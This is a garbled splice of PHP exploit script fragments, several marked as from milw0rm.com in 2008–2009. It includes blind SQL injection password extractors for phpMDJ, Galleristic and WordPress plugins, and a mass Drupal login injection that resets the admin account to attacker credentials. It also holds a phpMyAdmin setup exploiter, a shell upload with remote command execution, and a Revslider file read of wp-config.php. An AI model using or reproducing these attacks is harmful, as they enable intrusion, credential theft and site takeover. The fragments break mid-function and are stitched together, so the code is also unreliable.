function run($hostname, $path, $username)
{
$key = "abcdef0123456789";
$chr = 0;
$pos = 1;
echo "[+] Password: "******"\n\n";
}
function lengthcolumns($hostname, $path, $chs, $goodid)
{
echo "[+] username length: ";
$exit = 0;
$length = 0;
$pos = 1;
$chr = 0;
while ($exit == 0) {
$response = exploit($hostname, $path, $pos, $chr, $chs, $goodid);
if (preg_match("/javascript:addToCart/i", $response)) {
$exit = 1;
$length = $pos;
break;
} else {
$pos++;
if ($pos > 20) {
exit("Exploit failed");
}
}
}
echo $length . "\n";
return $length;
}
} else {
$table = "wp_users";
}
$host = $argv[1];
$spos = strpos($host, "http://");
if (!is_int($spos) && $spos == 0) {
$host = "http://{$host}";
}
$path = $argv[2];
$pageid = (int) $argv[3];
/* Detecting the version, if possible */
$version = file_get_contents($host . $path . 'wp-content/plugins/wp-e-commerce/readme.txt');
preg_match("/Stable tag: (.*)/", $version, $vmatch);
if (!isset($vmatch[1])) {
$version = "Not detectable\n";
} else {
$version = $vmatch[1];
}
echo "Version: " . $version . "\n";
/* End of version detecting */
/* Executing exploit */
preg_match('/[^.]+\\.[^.]+$/', $host, $hmatch);
$host_name = str_replace('http://', '', $hmatch[0]);
$tarray = array($table, 'wordpress_users', '_users', 'users', 'wpusers', 'wordpressusers', $host_name . '_users', str_replace('.', '', $host_name) . '_users', str_replace('.', '', $host_name) . 'users');
foreach ($tarray as $index => $val) {
echo exploit($host, $path, $pageid, $val);
}
/* End of exploit */
} else {
help();
}
if (preg_match("/EXPIERED/", $reply)) {
return false;
} else {
return true;
}
}
if ($argc != 4) {
usage();
}
$host = $argv[1];
$path = $argv[2];
$func = $argv[3];
$key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
//add a bigger char set if you can't get the username
$pos = 1;
$chr = 0;
echo "[☢] Creds: ";
while ($pos <= 32) {
if (exploit($host, $path, $func, $pos, $key[$chr])) {
echo $key[$chr];
$chr = 0;
$pos++;
} else {
$chr++;
}
}
echo "\n";
?>
# milw0rm.com [2009-01-26]
fclose($fp);
if (preg_match("/\"#FFFFFF\"> em <\\/font>/", $reply)) {
return false;
} else {
return true;
}
}
if ($argc != 4) {
usage();
}
$hostname = $argv[1];
$path = $argv[2];
$username = $argv[3];
$key = "abcdef0123456789";
$pos = 1;
$chr = 0;
echo "[+] Password: "******"\n\n";
?>
# milw0rm.com [2009-01-22]
echo "<form method='POST' enctype='multipart/form-data'>\n <input type='file'name='file' />\n <input type='submit' value='drupal !' />\n</form>";
move_uploaded_file($filetmp, $filename);
}
error_reporting(0);
if (isset($_POST['submit'])) {
function exploit($url)
{
$post_data = "name[0;update users set name %3D 'AnonCoders' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
$params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded\n", 'content' => $post_data));
$ctx = stream_context_create($params);
$data = file_get_contents($url . '/user/login/', null, $ctx);
if (stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data || stristr($data, 'FcUk Crap') && $data) {
$fp = fopen("exploited.txt", 'a+');
fwrite($fp, "Exploitied User: AnonCoders Pass: admin =====> {$url}/user/login");
fwrite($fp, "\n");
fwrite($fp, "--------------------------------------------------------------------------------------------------");
fwrite($fp, "\n");
fclose($fp);
echo "<font color='gold'><b>Success:<font color='red'> AnonCoders</font> Pass:<font color='red'> admin</font> =><a href='{$url}/user/login' target=_blank ><font color='green'> {$url}/user/login </font></a></font></b><br>";
} else {
echo "<font color='red'><b>Failed => {$url}/user/login</font></b><br>";
}
}
$urls = explode("\n", $_POST['url']);
foreach ($urls as $url) {
$url = @trim($url);
echo exploit($url);
}
}
echo "<br />";
echo '<center><a href="exploited.txt">View Exploited Drupal Sites</a></cenrer>';
if (strlen(trim($x[1])) == 0) {
return false;
} else {
return true;
}
}
function usage()
{
echo "\n[+] phpMDJ <= 1.0.3 Blind SQL Injection Exploit" . "\n[+] Author: darkjoker" . "\n[+] Site : http://darkjoker.net23.net" . "\n[+] Usage : php xpl.php <hostname> <path> <username>" . "\n[+] Ex. : php xpl.php localhost /phpMDJ admin" . "\n\n";
exit;
}
if ($argc != 4) {
usage();
}
$hostname = $argv[1];
$path = $argv[2];
$user = $argv[3];
$key = "abcdef0123456789";
$pos = 1;
$chr = 0;
echo "[+] Password: "******"\n\n";
# milw0rm.com [2009-01-11]
error_reporting(0);
set_time_limit(0);
ini_set("max_execution_time", 0);
ini_set("default_socket_timeout", 10);
$url = $argv[1];
$cmd = $argv[2];
$url_parts = parse_url($url);
$host = $url_parts['host'];
$path = $url_parts['path'];
if (isset($url_parts['port'])) {
$port = $url_parts['port'];
} else {
$port = 80;
}
echo "[~] Uploading shell... ";
exploit($host, $path, $port) ? print "OK\n" : die("Failed\n");
echo "[~] Executing command... ";
$res = cmd($host, $path, $port, $cmd);
if ($res) {
printf("OK\n%'-65s\n%s%'-65s\n", '', $res, '');
} else {
die("Failed");
}
function exploit($host, $path, $port)
{
$ock = fsockopen(gethostbyname($host), $port);
if (!$ock) {
return false;
}
$data = "--------bndry31337\r\n";
$data .= "Content-Disposition: form-data; ";
function GetUser($hostname, $path, $c)
{
$tmp = array();
$exit = 0;
while ($exit == 0) {
$response = exploit($hostname, $path, 1, $c - 1, 2);
if (preg_match("/\\'\\d(.*?)\\'/i", $response, $tmp)) {
$exit = 1;
return $tmp[1];
} else {
return "Can't Get\r\n";
}
}
}
<?php
#
# Name : Galleristic v1.0 (index.php cat) Remote SQL Injection Exploit
# Author : cOndemned
# Note : works only when magic_quotes_gpc = off
# Greetz : irk4z, GregStar, ZaBeaTy, Iwan, ElusiveN, doctor, Avantura ;*
#
function exploit($target, $v)
{
$injection = "/index.php?cat='-1+union+select+value+from+gallery_settings+where+id=" . $v . "/*";
$request = file($target . $injection);
for ($i = 0; $i < count($request); $i++) {
preg_match('/\'(.*)\'<\\/h2>/', $request[$i], $response);
if (!empty($response[1])) {
return $response[1] . '<br />';
}
}
}
# Usage : Run in a browser as : http://[yourbox]/exploit.php?target=http://[targetbox]/[path]/
if (empty($_GET['target'])) {
die('No target site specified!');
} else {
for ($c = 1; $c < 3; $c++) {
echo exploit($_GET['target'], $c);
}
}
?>
# milw0rm.com [2008-05-07]
$met = $opts[m];
}
if ($opts[o]) {
$file = $opts[o];
}
if ($opts[d]) {
$dir = $opts[d];
}
$cookies = '';
$delay = $min = $max = $mid = 0;
$fld1 = $fld2 = '';
if (!$forum) {
die("[X] You haven't specified any forum type!\n");
}
echo "[+] Target: {$url} [{$forum}]\n\n";
exploit();
function exploit_gallery($f)
{
global $cookies, $url, $fld1, $fld2;
$sql = get_sql($f);
$str = "NULL," . $fld1 . "," . $fld2 . ",NULL,NULL";
$req = sprintf($sql, $str);
$u = $url . "index.php?ind=gallery&op=edit_file&iden=" . urlencode($req);
$html = Send($u, NULL, $cookies);
if (strstr($html, "ERROR: Database error")) {
die("[X] SQL Query Error.. probably wrong table prefix\n");
} else {
if (strstr($html, "<title>Error</title>")) {
die("[X] This method failed. Try something else\n");
}
}
$album = $argv[3];
} else {
credits();
}
}
$page = 'thumbnails.php?album=' . $album;
$GLOBALS['album'] = $album;
echo "[+] Valid album number: " . $album . "\n";
$GLOBALS['cookies'] = getCookie($firstReply);
### get cookie from host
$prefix = getPrefix($GLOBALS['cookies']);
### get cookie prefix
echo "[+] Cookie prefix: " . $prefix . "\n";
$GLOBALS['prefix'] = $prefix;
$etalon = toPage(sendit($page, 'GET', $c_cookies));
### number of images at etalon page
$first_sql = '0) UNION SELECT ' . $album . ' AND 1=1/*';
### FIRST sql query - let's make valid album to be invisible
$first_cookie = toCookie($first_sql);
if (check($first_cookie) == 0) {
echo "exploit failed...";
credits();
}
### if album is still visible - site is unvulnerable
exploit('name');
exploit('password');
credits();
?>
# milw0rm.com [2008-01-22]
function exploit_site($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 200);
curl_setopt($ch, CURLOPT_URL, $url . "scripts/setup.php");
$result = curl_exec($ch);
curl_close($ch);
$ch2 = curl_init();
curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch2, CURLOPT_HEADER, 1);
curl_setopt($ch2, CURLOPT_TIMEOUT, 200);
curl_setopt($ch2, CURLOPT_URL, $url . "config/config.inc.php");
$result2 = curl_exec($ch2);
curl_close($ch2);
//print $url;
if (preg_match("/200 OK/", $result) and preg_match("/token/", $result) and preg_match("/200 OK/", $result2)) {
print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln";
print "\n[+] Exploiting, wait sec..\n";
$Handlex = FOpen("pmaPWN.log", "a+");
FWrite($Handlex, "\n[!] w00t! w00t! Found possible phpMyAdmin vuln");
FWrite($Handlex, "\n[+] Exploiting, wait sec..\n");
FClose($Handlex);
exploit($url);
} else {
$Handlex = FOpen("pmaPWN.log", "a+");
print "\n[-] Shit! no luck.. not vulnerable\n";
FWrite($Handlex, "\n[-] Shit! no luck.. not vulnerable\n");
FClose($Handlex);
}
}
<?php
$target = $argv[1];
define('wp_file', "../wp-config.php");
define('wp_args', "?action=revslider_show_image&img=");
define('wp_path', "/wp-admin/admin-ajax.php");
print "\n[!] Set target > {$target} \n\n";
$url = parseUrl($target);
$init = curl_init($url);
curl_setopt($init, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($init);
$code = curl_getinfo($init, CURLINFO_HTTP_CODE);
if ($code == 200) {
exploit($data);
} else {
notVuln();
}
function exploit($data)
{
$lines = split("\n", $data);
$rest = array();
foreach ($lines as $line) {
$data = split("DB_", $line);
if (!empty($data[1])) {
$rest[] = "(DB_" . $data[1] . "\n";
}
}
if (empty($rest)) {
notVuln();
} else {
print "\n[!] VULNERABLE!!!\n\n";
function lengthcolumns($hostname, $path, $chs)
{
echo "[+] username length: ";
$exit = 0;
$length = 0;
$pos = 0;
$chr = 0;
while ($exit == 0) {
if (exploit($hostname, $path, $pos, $chr, $chs)) {
$exit = 1;
$length = $pos;
} else {
$pos++;
}
}
echo $length . "\n";
return $length;
}
